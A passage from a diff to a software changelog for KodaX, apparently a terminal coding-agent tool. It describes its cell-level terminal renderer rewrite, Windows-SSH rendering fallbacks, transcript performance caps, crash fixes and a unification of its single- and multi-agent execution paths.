`THINKING_SHOW_ALL_HARD_CHAR_CAP = 200_000` per-block char cap that fires even when `showAllContent` is on (previously the show-all branch bypassed all caps and returned `item.text` directly). The thinking-case dispatch in `buildTranscriptRows` now routes show-all through `buildThinkingPreview` so the cap is consistently enforced; truncated content gets a hint pointing at session artifacts. **Track 4 (regression tests)**: 4 new tests in `parse-helpers.test.ts` (tail-window scan, full-text scan, oversized-prefix straddling, absent-block-in-tail-window) + 3 new tests in `transcript-layout.test.ts` (finite-cap export sanity, oversized thinking under show-all, under-cap thinking pass-through). **What's NOT in scope (with documented triggers)**: intra-round `runResult.messages` collapse — the substrate-level redesign required (autoReroute / sanitize-thinking / error-recovery middleware all reach into `result.messages` during a round) is profile-driven and deferred until a concrete heap-pressure repro warrants it; proper viewport virtualization (only materializing visible rows) is a separate refactor — the Tier 1 hard caps deliver the boundedness invariant Track 3 required without the architectural cost; headless `--print`-style output mode — KodaX has no equivalent CLI entry; deferred until that product surface exists. Tests: `packages/coding` + `packages/repl` 2,464 passing / 1 pre-existing Windows EPERM flake unrelated to this change. TypeScript clean. **FEATURE_060 Status: Completed (Tier 1).**
459
+
460
+ - **FEATURE_057 Track F Phase 6 — Legacy renderer retired (Track F closes)**: The `log-update.js` factory + `cursor-helpers.js` shim + `KODAX_TRACK_F` opt-out gate + `RenderOptions.incrementalRendering` typed shim are all gone. Cell-level diff renderer is now KodaX's only render path. **Phase 6 review-stage fixes (2026-04-29)**: post-implementation review caught two regressions that landed alongside the renderer retirement and were patched before release. **(1) Cursor visibility regression** — legacy `log-update.js`'s `createStandard` called `cliCursor.hide(stream)` on first render (default `showCursor=false`); Phase 6's deletion dropped this hide call, so the OS terminal cursor would otherwise blink at the bottom-left of the rendered UI (post-render cursor lands at `(0, screen.height)`). Fix: `engine.js` now emits a one-time `\x1b[?25l` write at the start of the first `onRender` (gated to non-CI / non-debug / non-screen-reader paths), paired with `App.js`'s existing useEffect cleanup `cliCursor.show(stdout)` on unmount. **(2) `resetOutputTracking` not reseeding `prevFrame`** — callers (`setShellMode` / `setAltScreenActive`) invoke the reset when alt-screen toggles or mouse-tracking flips happen outside the cell-renderer pipeline; without an `invalidateCellFrame()` call the next `applyCellFrame` would diff against a stale `prevFrame` and leave rows un-repainted. Fix: added `this.invalidateCellFrame()` to `resetOutputTracking`, symmetric with the other write-paths (`writeToStdout` / `writeToStderr` / `clear` / fullscreen-branch) that already invalidate after writing outside the cell pipeline. Two new regression tests in `engine.test.ts` pin both invariants (one-time cursor hide + prevFrame reseed on alt-screen toggle). **Files deleted (12 paths)**: `core/internals/log-update.js` (310 lines, engine-side legacy), `substrate/ink/log-update.js` (241 lines) + .map, `substrate/ink/cursor-helpers.js` (55 lines) + .map (only consumer was log-update), and four substrate-side dead files (`ink.js` 769 lines + .map, `render.js` + .map, `index.js` + .map, `instance.js` orphan vendored leftover) — production runtime never instantiated the substrate `Ink` class; everything went through `core/engine.js`. Phase 6a audit confirmed dead-code via `git grep -E "from.*substrate/ink['\"]"` returning zero hits across the repo. **engine.js surgery (~150 lines rewritten)**: dropped `import logUpdate`, `this.log = logUpdate.create(...)`, `throttledLog = throttle(...)`. `onRender`'s fullscreen branch `this.log.clearAndRender(fullFrameOutput)` → `stdout.write(eraseLines + fullFrameOutput)` as one atomic write (preserves FEATURE_096 Win10 OpenSSH/ConPTY fix); has-static branch `this.log.clear() + write(staticOutput) + this.log(outputToRender)` → `stdout.write(eraseLines + staticOutput) + invalidateCellFrame() + applyCellFrame(frame)`; legacy fallback `else if (output !== this.lastOutput || this.log.isCursorDirty())` deleted entirely (cell renderer always claims dispatch); `restoreLastOutput` rewritten to replay `prevFrame` via `cellLogUpdate.render(emptyFrame, prevFrame) + applyDiff` (cell-renderer-based restore keeps `prevFrame` consistent with screen state, no separate invalidate after); `writeToStdout` / `writeToStderr` / `clear()` / `resized()` / `setCursorPosition` / `resetOutputTracking` / `unmount` cleanup all dropped their `this.log.*` calls; `unmount`'s `throttledLog` flush + `this.log.done()` cleanup gone (cell renderer is stream-stateless). **renderer.js (substrate + core mirror)**: removed `isCellLevelRendererEnabled` import + the `if (isCellLevelRendererEnabled())` gate around `frame` construction — frame is now populated unconditionally on the non-screen-reader path. **cell-renderer.ts**: deleted `isCellLevelRendererEnabled` function + module JSDoc rewritten. **RenderOptions.incrementalRendering**: deleted from `tui/core/root.tsx` interface + two `incrementalRendering: false` defaults. **Tests**: 19-test delta (cell-renderer.test.ts gate suite + opt-out tests in both renderer.test.ts mirrors deleted, no longer a gate to test); engine.test.ts full rewrite (assertions migrated from `mocks.log.*` legacy mock to `mocks.stdoutWrite` actual user-visible behavior, fixtures use `createScreen` so `applyCellFrame` exercises the real cell renderer); 940/940 green in repl package, full repo regression: 367/373 files passing (6 pre-existing Windows EPERM/ENOENT temp-dir race flakes under high parallel load, all re-running clean in isolation). TypeScript build clean. **Risk eval**: deletion-heavy parts (substrate dead code, gate, option) are zero-risk; engine.js surgery preserves byte-level invariants the legacy paths required (single atomic write for SSH/ConPTY fullscreen, eraseLines+content for has-static, eraseLines+data+replay for writeToStdout). The `restoreLastOutput` rewrite is strictly more correct than legacy (cell renderer's diff is sound where log-update's `this.log(lastOutputToRender)` depended on bookkeeping consistency). No `KODAX_TRACK_F=off` opt-out anymore — users wanting to revert use a prior version. **Track F (cell-level diff renderer absorbing FEATURE_095) is complete.**
461
+
462
+ - **FEATURE_057 Track F Phase 5d + 5e — Cell renderer becomes default + stale SSH tune cleanup**: Phase 5d flips `isCellLevelRendererEnabled` from strict-equality `=== "on"` (opt-in) to strict-inequality `!== "off"` (opt-out). Cell renderer is now the default render path on every code path that previously honored the flag (`substrate/ink/{ink,renderer}.js` + `core/{engine.js,internals/renderer.js}`). Emergency rollback path remains a single env-var: `KODAX_TRACK_F=off` reverts to the legacy `log-update.js` factory and behavior is byte-identical to pre-Track-F (both renderers continue to be constructed unconditionally; only the dispatch branch differs). Strict-inequality matching (vs three-state truthy parsing) keeps the surface minimal for Phase 6's gate deletion. **Comment hygiene**: 5 stale "Initialized only when `KODAX_TRACK_F=on`" comments in `ink.js` / `engine.js` / `renderer.js` × 2 / `InkREPL.tsx` rewritten to reflect default-on semantics; the `incrementalRendering disabled - causes cursor positioning issues with custom TextInput` comment in `InkREPL.tsx` (a v0.7.0-era diagnosis of the exact symptom Track F's absolute-cursor diff resolves) replaced with a Phase 5d/6 forward note. **Phase 5e** was smaller than planned: the `KODAX_INCREMENTAL_RENDERING + sshDetected + maxFps: 15` interim SSH B-plan branch the design doc anticipated was never actually landed in code (verified via `git log --all -S` zero-hit), so 5e collapsed to documenting `RenderOptions.incrementalRendering` as a typed shim no-op under default-on (Phase 6 will delete the field with the legacy renderer). **Tests**: 4 flag-gate test files rewritten (cell-renderer + substrate renderer + core renderer + 6 strict-inequality value cases × 2 mirrors); full repl package 121 files / 959 tests green; TypeScript build clean. **Risk evaluation**: 5d is the user-facing behavior change — every Windows-Terminal / VS Code / POSIX / SSH user gets the new renderer on first v0.7.30 launch. Algorithm is structurally identical to CC reference (`c:/Works/claudecode/src/ink/log-update.ts`), burned in via 192 + 11 + 46 test fixtures across Phase 4 + 5 step 1 + 5 step 2.
463
+
464
+ - **FEATURE_057 Track F Phase 5 step 2 — First-render path CC-aligned (cleanup)**: Removes a small but principled deviation from CC reference. KodaX's `LogUpdate.render` carried a `prev.screen.height === 0` short-circuit that routed first-render through `renderFullFrame`, leaving the cursor mid-row at the last painted glyph; `apply-cell-frame.ts` then emitted an explicit post-write `\n` to realign the cursor for subsequent incremental moves. The `\n` was correct in normal cases but introduced a fullscreen-fit drift (Phase 4 review's MEDIUM-1) — patched then with a `screen.height < viewport.height` guard. Phase 5 step 2 deletes both the short-circuit and the explicit `\n` (and its guard). Empty-prev → non-empty-next now flows through the incremental path naturally: `diffEach` skips every coordinate (`growing && y >= 0`), `renderFrameSlice` paints all rows with row-final `\r\n`, `restoreCursor` is a structural no-op when `next.cursor.y === screen.height`. The algorithm is now a single shape regardless of whether `prev` was empty or populated. Mirrors `c:/Works/claudecode/src/ink/log-update.ts:123-466` exactly. Two tests rewritten in `cell-renderer.test.ts` (first-render now asserts `\r\n` emission via incremental, not `[{stdout:"ab"}]` from `renderFullFrame`); four tests rewritten in `apply-cell-frame.test.ts` (single applyDiff write asserted, viewport-fill guard test deleted as the guard itself is gone). 46/46 green for the touched files; full repl package: 953/953 green; no regressions. Side-task: added KNOWN_ISSUES #126 documenting tmux's default OSC 8 passthrough behavior and the `set -g allow-passthrough on` workaround (pre-existing condition affecting both legacy and cell renderers; recorded for user discoverability).
465
+
466
+ - **FEATURE_057 Track E — Output ownership & renderer boundary purification (first phase)**: 3 channel-mismatch `console.log` bugs in `InkREPL.tsx` (cancellation feedback, invocation error, Plan-Mode error) routed solely through the React history channel — previously they double-emitted via raw `console.log` which, with `patchConsole: false` (vendored substrate), bypassed Ink and landed in the wrong screen position. `TextInput.useTerminalWidth` now subscribes to the renderer-owned terminal size via `useTerminalSize()` instead of `process.stdout` directly, so the substrate's owned-stdout boundary holds when the renderer is attached to a non-default stream. Audit confirmed `AlternateScreen.tsx`, slash-command callbacks (captured by `executeCommand` wrapper at `InkREPL.tsx:6661-6679`), shutdown sequence (writes after `cleanup()` + `setRawMode(false)` + `stdin.pause()`), and pre-Ink boot writes were already correct. See `docs/features/v0.7.30.md` Track E status section for full audit log.
467
+
468
+ - **FEATURE_057 Track F Phase 5 step 1 — Engine-mirror integration: cell renderer wired into `core/engine.js` + `core/internals/{output,renderer}.js` (still flag-gated)**: Phase 5 step 1 mirrors the Phase 4 wiring into KodaX's engine-side renderer (the "core mirror" of the vendored ink substrate; design doc requires both renderers to be wired in lockstep). Three sub-steps: **5a** — extracted `Output.getGrid()` in `core/internals/output.js` (mirrors Phase 4a refactor on substrate). **5b** — added optional 3rd `terminalSize` param + `frame` return field to `core/internals/renderer.js`, importing `isCellLevelRendererEnabled` + `outputToScreen` from `../../substrate/ink/` (cross-directory import; the cell-renderer logic lives canonically in substrate/ink — direction is one-way, preserving acyclicity). 11 mirror tests in `core/internals/renderer.test.ts`. **5c** — wired `cellLogUpdate` + `applyCellFrame` + `invalidateCellFrame` into `core/engine.js` (constructor instantiates when flag on; `onRender()` branches before legacy `throttledLog`; `resized()` / `writeToStdout()` / `writeToStderr()` / `clear()` reseed `prevFrame` on legacy-path side effects). KodaX-specific deviation: introduced `OutputLike` duck-typed interface in `output-to-screen.ts` (read-only `width` / `height` / `getGrid()`) so both `substrate/ink/output.js` and `core/internals/output.js` Output instances satisfy the parameter type without `// @ts-ignore` — fixes the previous type lie identified in code review (MEDIUM-1). **Code-review verdict: WARNING (0 CRITICAL, 1 HIGH, 3 MEDIUM, 1 LOW)** — 4 of 5 fixed before merge: HIGH-6 (`invalidateCellFrame` missing on `!shouldRestoreManagedShellAfterExternalWrite()` early-return paths) added the call; MEDIUM-1 (cross-directory type lie) → `OutputLike`; MEDIUM-3 (fullscreen branch returned without invalidating prevFrame, drifting on alt-screen exit) → `invalidateCellFrame()` before fullscreen early-return; MEDIUM-5 (no focused engine.onRender dispatch tests) deferred to Phase 5d with TODO comment (covered indirectly via shared `applyCellFrame.test.ts`); LOW-4 (mid-session dual-renderer flag-flip safety) confirmed safe. **Phase 5d (default flip) + 5e (SSH tune removal) deliberately deferred** for explicit user authorization — both are user-facing behavior changes (existing users would see cell renderer engage by default; FEATURE_096 SSH tune `KODAX_INCREMENTAL_RENDERING` becomes obsolete once cell renderer ships). 11 new tests; combined Phase 1-5-step-1 substrate + core test count: **203 tests**. Repo full suite: 372 files / 3784 tests + 23 todo, zero regressions. TypeScript build clean.
469
+
470
+ - **FEATURE_057 Track F Phase 4 — Substrate integration: cell renderer wired into `renderer.js` + `ink.js` (still flag-gated)**: Phase 4 closes the substrate-integration risk. Three sub-phases: **4a** ships two new pure modules — `apply-diff.ts` (Patch → terminal-bytes serializer with single-`stream.write` invariant; empty diff skips the write entirely) and `output-to-screen.ts` (vendored `Output` 2D `StyledChar` grid → KodaX `Screen`, with SGR codes landing in `cell.style`, OSC 8 hyperlinks extracted into `cell.hyperlink`, and SpacerTail recreation for wide-char tails). **4a vendored refactor**: `Output.get()` operation-replay loop extracted into a new `Output.getGrid()` method; `get()` now wraps `getGrid()`. Both render paths share the same replay logic so the cell grid stays consistent with the legacy string output. **4b** modifies `renderer.js` to accept an optional 3rd `terminalSize` parameter (so `frame.viewport` reflects the real TTY dimensions, not yoga-computed content size) and returns an additional `frame` field, populated only when `KODAX_TRACK_F=on` and the screen-reader pipeline is off. Legacy `output` / `outputHeight` / `staticOutput` fields remain populated regardless of flag — toggling the flag does not change legacy-path bytes. **4c** wires the cell path into `ink.js`'s `onRender()` hot path: a new branch in the simple-incremental tail (just before `throttledLog`) routes through `applyCellFrame` (a free function in `apply-cell-frame.ts` for unit-testability without React) when the flag is on. Constructor instantiates `cellLogUpdate` + seeds `prevFrame = emptyFrame(rows, cols)` only when the flag is on; mid-session flag flips are explicitly undefined. `resized()` reseeds `prevFrame` with `emptyFrame(rows, currentWidth)` on width-shrink so the next render goes through the full-frame paint path (mirrors the legacy `this.log.clear()` + `lastOutput = ''` pattern). Other `onRender` branches (debug / CI / screen-reader / fullscreen / has-static) are deliberately untouched in Phase 4 — Phase 5 expands cell coverage. KodaX-specific deviation: explicit first-render `\n` post-write at the call site (in `apply-cell-frame.ts`) realigns terminal cursor with `frame.cursor = (0, screen.height)` after `renderFullFrame` (which lands cursor at end-of-last-line); CC reference handles this implicitly inside its first-render path. **Code-review verdict: WARNING (0 CRITICAL, 0 HIGH, 2 MEDIUM, 2 LOW)** — all four addressed before merge: MEDIUM 1 (fullscreen first-render `\n` would scroll the terminal and drift `prevFrame.cursor`) gated with `frame.screen.height < frame.viewport.height` guard; MEDIUM 2 (`writeToStdout`/`writeToStderr`/`clear()` legacy-path writes leave `prevFrame` stale) added `invalidateCellFrame()` helper called after each of the three legacy call sites to reseed `prevFrame = emptyFrame(...)`; LOW 1+2 inaccurate comments fixed. 45 new substrate/ink tests (16 apply-diff + 10 output-to-screen + 11 renderer + 8 apply-cell-frame, the last includes the 2 viewport-fill tests added during the MEDIUM-1 fix); combined Phase 1-4 substrate test count: **192 tests**. Repo full suite: 372 files / 3773 tests + 23 todo, zero regressions caused by Phase 4 (1 known-flaky `tests/sa-refactor-goldens/selection.test.ts` real-corpus parsing test occasionally times out at 5s on slow Windows filesystem; pre-existing). TypeScript build clean.
471
+
472
+ - **FEATURE_057 Track F Phase 1 — Cell-level diff renderer typed skeleton (flag-gated)**: First of 6 phases for the cell-level diff renderer rewrite. Five new files under `packages/repl/src/tui/substrate/ink/`: `csi.ts` (pure CSI primitives), `osc.ts` (OSC 8 hyperlinks), `cell-screen.ts` (immutable cell-grid `Screen` + `cellAt` / `diffEach` / `shiftRows`), `frame.ts` (`Frame` / `Diff` / `Patch` / `shouldClearScreen`), `cell-renderer.ts` (`LogUpdate` class stub + `KODAX_TRACK_F=on` flag gate). Stub `render(prev, next)` returns empty diff so the flag-on path is deliberately blank (diagnosable) rather than partially rendered (would corrupt terminal). Zero behavioral change — legacy `log-update.js` remains the production renderer until Phase 6. 46 new unit tests pin the type contracts (csi: 12, osc: 6, cell-screen: 16, frame: 6, cell-renderer: 6). Naming: new file is `cell-renderer.ts` not `log-update.ts` because the legacy `log-update.js` co-exists in the same directory until retirement; TypeScript module resolution would conflict on shared basename.
473
+
474
+ - **FEATURE_057 Track F Phase 3 (3b + 3c) — Algorithm decisions + incremental main loop (still flag-gated)**: Phase 3 closes the algorithmic core of the cell-level renderer. **3b** introduces a new `viewport-state.ts` file with three pure decision functions: `computeViewportState(prev, next)` returns `{viewportY, cursorAtBottom, growing, shrinking, prevHadScrollback, nextFitsViewport}` with formulas annotated to CC reference lines (architect's "build viewportY fixtures before implementing" discipline followed); `shouldFullReset(prev, next)` returns the 4-case full-reset decision (resize / shrink-from-above-viewport / scrollback-cell-change / linesToClear-exceeds-viewport) with optional `trigger: {y, prevLine, nextLine}` debug info on scrollback hits; `shouldSkipDiff(removed, added, isEmptyAdded)` is the per-cell skip predicate (SpacerTail / empty-no-removed). 32 fixtures hand-traced against CC arithmetic. **3c** adds `renderIncremental(prev, next): Diff` to `cell-renderer.ts` — the main orchestrator that composes Phase 3a primitives with Phase 3b decisions: shrink → diffEach walk → grow rows → cursor restore. `LogUpdate.render()` routing now has 4 paths (non-TTY / first-render / full-reset / incremental). Two extracted helpers: `emitPatches` (zero-delta patch sequence) and `resetStyleAndHyperlink` (tracker reset). 5 integration tests cover steady-state cell change, growing/shrinking frames, resize reset, and scrollback-cell-change reset. Combined Phase 1-3c substrate test count: 143 tests. KodaX-specific deviations from CC: no `clearTerminal.debug` field (computed but not threaded through Patch shape yet), no `altScreen` / `decstbmSafe` parameters (DECSTBM optimization out-of-scope per design), no frame-timing instrumentation.
475
+
476
+ - **FEATURE_057 Track F Phase 3a — Cell-level write/cursor primitives (still flag-gated)**: Phase 3 was originally one phase; split into 3a (mechanical primitive ports, low risk) and 3b (algorithmic main loop, high risk) for independent review boundaries. 3a adds `writeCellWithStyleStr` (cell write with viewport-edge wide-char skip + wcwidth compensation + pending-wrap state), `moveCursorTo` (cursor positioning with `\r` reset for cross-row / pending-wrap cases), `renderFrameSlice` (row-range render using LF for cursor advancement so the viewport scrolls at the bottom margin, with unstyled-empty-cell skip), `readLine` (line read-back for `triggerY` debug info), `fullResetSequence_CAUSES_FLICKER` (full-screen reset fallback emitting `clearTerminal` + fresh full render). All primitives route mutation through `VirtualScreen.txn` (correctness + encapsulation > one closure-tuple-delta allocation per cell; Phase 6 may inline if profiling shows). 19 new tests pin the byte sequences (total 99 substrate tests). Zero regressions.
477
+
478
+ - **FEATURE_057 Track F Phase 2 — `renderFullFrame` + `VirtualScreen` skeleton + transition helpers (still flag-gated)**: Adds the first real rendering logic. `renderFullFrame(frame: Frame): Diff` walks the cell grid row-by-row, skips `SpacerTail` cells, emits hyperlink/SGR style transitions inline, returns a single `stdout` patch with lines joined by `\n` and trailing whitespace trimmed per line. `LogUpdate.render(prev, next)` now routes non-TTY and first-render (`prev.screen.height === 0`) to `renderFullFrame`; incremental case still returns `[]` (Phase 3 fills). New pure helpers: `transitionStyle` and `transitionHyperlink` return `{ patches, current }` — explicitly NOT accumulator-mutation style (Claude Code's reference mutates a passed-in array; KodaX's CRITICAL immutability rule forbids that pattern). `needsWidthCompensation(char)` flags emojis where terminal wcwidth tables disagree with Unicode (U+1FA70-1FAFF, U+1FB00-1FBFF blocks; multi-codepoint graphemes containing VS16). `VirtualScreen` class skeleton (Phase 3 cursor-state machine) ships with `cursor: Readonly<Point>` externally + `_cursorMut` internal handle so observers can't accidentally write to it from outside the class. New `SGR_RESET` constant in `csi.ts` (`\x1b[0m`). +34 tests in cell-renderer.test.ts (total 80 substrate tests). Code-review found 2 HIGH, 3 MEDIUM, 2 LOW — all actionable items addressed before merge (notably H2 immutability violation in `transition*` helpers refactored to pure functions).
479
+
480
+ - **FEATURE_096 — Windows-SSH ConPTY Host Auto-Downgrade to Main-Screen Policy** (originally planned `v0.7.39`, migrated into `v0.7.30` 2026-04-28 to land alongside FEATURE_057). New `remote_conpty_host` host profile in `TerminalRenderHost` union that detects `platform=win32 + (SSH_CONNECTION | SSH_CLIENT | SSH_TTY)` and routes the affected sessions to a main-screen policy (`enabled:false`, `mouseWheel/Clicks:false`, `streamingPreview:false`, `transcriptSpinnerAnimation:true`). Solves two layered platform issues: (1) Windows OpenSSH Server's ConPTY layer silently consumes VT mouse-tracking byte sequences before they reach the child process stdin, so KodaX's normal fullscreen + alt-screen path leaves users with broken mouse-wheel scroll while alt-screen bypasses the terminal's native scrollback; (2) Windows conhost's `SetConsoleCursorPosition` cursor-up viewport yank bug ([microsoft/terminal#14774](https://github.com/microsoft/terminal/issues/14774)) — when string-level `log-update` emits `cursor up + eraseLines` per frame and the cursor crosses the viewport's top edge, conhost yanks the user's view to the top of the scrollback buffer mid-stream, surfacing as the "repeated re-rendering" symptom. Affected users now keep the spinner + Banner + StatusBar + PromptFooter + BackgroundTaskBar through main-screen Ink rendering; live token streaming is intentionally disabled at main-screen (matches Claude Code's `hasCursorUpViewportYankBug`-gated `showStreamingText` policy in `c:/Works/claudecode/src/screens/REPL.tsx:1463`) and re-enabled once 057 Track F's absolute-cursor cell-level diff renderer lands. xtermjs check (VS Code Remote-SSH) runs first so VS Code Remote-SSH on Windows is not falsely downgraded.
481
+ - **`KODAX_FULLSCREEN` user-level escape hatch** (FEATURE_096): `KODAX_FULLSCREEN={1|0|未设}` three-state single variable lets users override automatic fullscreen decisions when the auto-downgrade judgement is wrong. `=1` short-circuits at the detect layer (Windows-SSH no longer routes to `remote_conpty_host`, falls through to its underlying host classification — typically `degraded_vt` — and gets fullscreen + mouse). `=0` forces every host into the main-screen + mouse-off + streaming/spinner-preserved policy regardless of detected host (user explicitly preferring terminal-native scroll). Naming is around the actual fullscreen decision rather than mouse control because mouse failure is a side-effect of leaving fullscreen, not the user's intent; an earlier `KODAX_DISABLE_MOUSE` design contained a dead state where `=1` meant "keep fullscreen but disable mouse" — alt-screen blocks terminal scrollback while the app no longer receives wheel events, so users with `=1` had no way to scroll at all.
482
+
483
+ - **FEATURE_060 Tier 2 — SSH transcript-resume perf (UUID-anchored 200-cap + useDeferredValue + transcript-mode 30-cap)** (commit `89c7dbb`): user-reported lag on `kodax -c` of long sessions over Windows-SSH — input took seconds to register, spinner refresh stuttered, entire history materialized untruncated. Root cause: KodaX wrapped Ink's `<Static>` around historical items (paint-once-to-scrollback semantics), but the one-time first-paint of N items is one giant `stream.write` to SSH/ConPTY; every spinner tick / keystroke triggered a full `buildTranscriptRenderModel` rebuild scaling O(N) on local CPU. KodaX had no count-based cap (only `MAX_VISIBLE_ROUNDS = 20` UX preference + `TRANSCRIPT_HARD_LINE_CAP = 100K` Tier 1 OOM safety). Three sub-changes mirror claude-code's production-tested non-virtualized pattern: (1) `computeTranscriptCapStart` + `TRANSCRIPT_RENDER_CAP = 200` + `TRANSCRIPT_RENDER_CAP_STEP = 50` UUID-anchored slice in `transcript-layout.ts` (immune to `collapseToolCalls` regrouping id churn, CC-1174; advances in 50-item steps to avoid per-append static block re-paint, CC-941; fallback clamps stored idx against `length - cap`); (2) `useDeferredValue` on `displayHistory` in `InkREPL.tsx` so spinner ticks + keystrokes get React's high-priority schedule while the heavy render-model rebuild runs on the low-priority track (mirrors CC's REPL.tsx:1318); (3) `TRANSCRIPT_MODE_VISIBLE_MESSAGES = 30` in transcript-mode when `showAllInTranscript` is off so the surface lands close to the active turn instead of buried under hundreds of historical rounds (mirrors CC's Messages.tsx:276). Note: claude-code's `VirtualMessageList` requires fullscreen `scrollRef` which is unavailable on Windows-SSH (FEATURE_096 auto-downgrades to main-screen) — so this cap-based fix is the correct mechanism for the affected environment, not a virtualization port. 10 new tests in `transcript-layout.test.ts` pin the anchor algorithm: under cap / at cap / at cap+step boundary / past cap+step advancement / append-within-step stability / id-vanish-with-list-over-cap fallback / id-vanish-with-list-under-cap returns 0 / shrunk-list clamp / empty list clears anchor / constant values match CC parity.
484
+
485
+ ### Fixed
486
+
487
+ - **`outputToScreen` row-overflow crash** (commit `1b03275`, P0 hotfix): production crash on idle SSH session — `RangeError: setCellAt out of bounds: (148, 6) on 148x15` at `output-to-screen.ts:200` → `core/internals/renderer.js:63` → `core/engine.js:358`. Root cause: `Output.getGrid()` does NOT clamp writes to `width`. A write operation whose text extends past the right edge causes the row array to grow longer than `width` (JavaScript silently extends arrays via index assignment). The legacy `Output.get()` path tolerated this via `filter(undefined).trimEnd()` — overflow cells were dropped during string serialization. The new cell-renderer adapter `outputToScreen` iterated `row.length` instead of `width` and called `setCellAt(width, y, ...)`, which throws by design ("surface bugs early") and crashed the process. Phase 6 (this release) made the cell renderer the sole render path, so any overflow now hits this throw instead of being silently clipped. SSH sessions trip it more easily because terminal-width / Yoga-computed content-width disagreements expose the boundary cell. Fix at the adapter boundary (not at `setCellAt` — the throw is correct for grid-internal bugs): clamp the loop to `Math.min(row.length, width)` on x and `Math.min(grid.length, height)` on y. Two regression tests pin the invariant: a real `Output.write` with text longer than `width`, and a synthetic grid with `row.length > width`.
488
+
489
+ - **`engine.js setCursorPosition` defensive coordinate clamp** (commit `89c7dbb`): the setter previously stored the position verbatim into `this.cursorPosition`. Today nothing reads that field downstream (cell renderer derives cursor from `frame.cursor` instead), so an out-of-bounds value was harmless — but the comment explicitly anticipated future renderer-level IME wiring re-applying it. If that future caller routed the value through `setCellAt`, an out-of-bounds (x, y) would hit the deliberate `RangeError: setCellAt out of bounds` and crash the process (same class as the `1b03275` crash). Clamp at the storage boundary: `(x, y)` is clamped to `[0, columns-1] × [0, rows-1]`, undefined passes through, and a zero-dim terminal (mid-resize edge case) drops to undefined rather than storing a guaranteed-broken coordinate. Test: `engine.test.ts` "setCursorPosition clamps...".
490
+
491
+ - **`packages/repl/vitest.config.ts` workspace alias parity** (commit `6a01995`): running `npx vitest run` from `packages/repl/` failed at collection time on 18 test files with `Failed to resolve entry for package "@kodax/ai"` (and `@kodax/core`, `@kodax/mcp`, `@kodax/repointel-protocol`, `@kodax/session-lineage`). Root cause: when vitest is invoked from a sub-package directory it loads THAT package's `vitest.config.ts`, not the root one. The repl config aliased only 3 of 9 workspace packages — for everything else, vitest fell back to npm-workspace symlink resolution into `node_modules/@kodax/<pkg>/package.json`, whose `main` points to `dist/index.js`, which is absent without an explicit `tsc -b` build. Test files that don't directly import these packages still fail because `@kodax/coding`'s source pulls in `@kodax/ai` / `@kodax/core` / `@kodax/mcp` / `@kodax/repointel-protocol` / `@kodax/session-lineage` transitively, and the alias-resolved source path means vitest walks the full module graph through TS source. Fix: add aliases for every workspace package to both vitest configs (repl now aliases all 9 packages to their `src/index.ts`; root gains the 4 it was missing for parity). 18 failed files → 0 (121/121 pass, 959/959 tests in `packages/repl`; 372/373 + 1 pre-existing Windows timing flake at root). Documented the rationale + transitive-deps gotcha inline so the next contributor adding a workspace package registers an alias here.
492
+
493
+ ---
494
+
495
+ ## [0.7.29] - 2026-04-27
496
+
497
+ ### Theme
498
+
499
+ SA / AMA substrate unification (Option Y deletion) + role-aware reasoning + prompt-eval foundation. KodaX's two top-level execution paths — `runKodaX` (single-agent) and `runManagedTaskViaRunner` (multi-agent Scout/Generator/Planner/Evaluator) — collapse onto a single declaration-borne substrate executor; legacy `agent.ts` shrinks from ~3000 lines to a 49-line `Runner.run` shim. Reasoning depth becomes a 5-tier resolution chain (user ceiling → agent default → Scout hint → Evaluator-revise escalate → user-followup escalate) replacing the flat single-mode model. New top-level `benchmark/` folder formalizes the prompt-evaluation discipline: any prompt content change must include a quality-only multi-run benchmark with persisted REPORT.md and per-category judge decomposition. Folder convention separates version-tracked artefacts (docs, datasets, harness code) from non-tracked run results.
500
+
501
+ ### Added
502
+
503
+ - **FEATURE_100 — SA Runner Frame Adoption & Capability Unification**: Single-agent (`runKodaX`) and adaptive-multi-agent (`runManagedTaskViaRunner`) paths now share one substrate. Per ADR-020, the legacy "Option Y" facade (preset dispatcher registry that wrapped `runKodaX` so `Runner.run(defaultCodingAgent, …)` *appeared* SDK-native while the body stayed on the legacy path) is deleted: the substrate executor is attached directly to the Agent declaration via `Agent.substrateExecutor`, and `Runner.run` consults that field before any registry lookup. `agent.ts` collapses from a ~3000-line implementation to a 49-line shim that just calls `Runner.run(createDefaultCodingAgent(), prompt, { presetOptions: options })`; the old body is relocated to `agent-runtime/run-substrate.ts:runSubstrate` and exposed as the canonical executor closure. Five rounds of P3 sharding (P3.6g through P3.6v) extract per-CAP helpers, activate ~50 previously-stub `it.todo` contract tests, and drive AMA-shared CAP coverage from 3/13 → 17/17 (every Class-A capability now provably runs identically on both topologies). Closes the substrate drift FEATURE_080 (v0.7.23) deferred when "Option Y" originally landed.
504
+ - **FEATURE_078 — Role-Aware Reasoning Profiles (4-tier L1-L4 chain)**: `--reasoning <off|auto|quick|balanced|deep>` semantics shift from "all roles use this mode" to "ceiling + bias for default". Resolution chain: L1 user ceiling → L2 Agent declaration `reasoning` profile (default + max + escalateOnRevise) → L3 Scout `downstream_reasoning_hint` → L4 Evaluator-revise dynamic escalation (clamped by L1). New public API in `packages/coding/src/reasoning.ts`: `compareReasoningModes` / `clampReasoningMode` / `resolveRoleReasoning(role, userCeiling, profile?, scoutHint?)` / `escalateThinkingDepth(depth, ceiling?)`. Backward-compat preserved: when no Agent profile and no scout hint are supplied, the resolver collapses to the pre-FEATURE_078 single-mode answer. SA path gains an L2 anchor via `DEFAULT_CODING_REASONING_PROFILE` on `createDefaultCodingAgent`, restoring ADR-003 alignment (SA must have a role anchor). `--reasoningCeiling` accepted as a permanent alias of `--reasoningMode` (no breaking rename). 21 active unit tests pin the L1-L4 matrix.
505
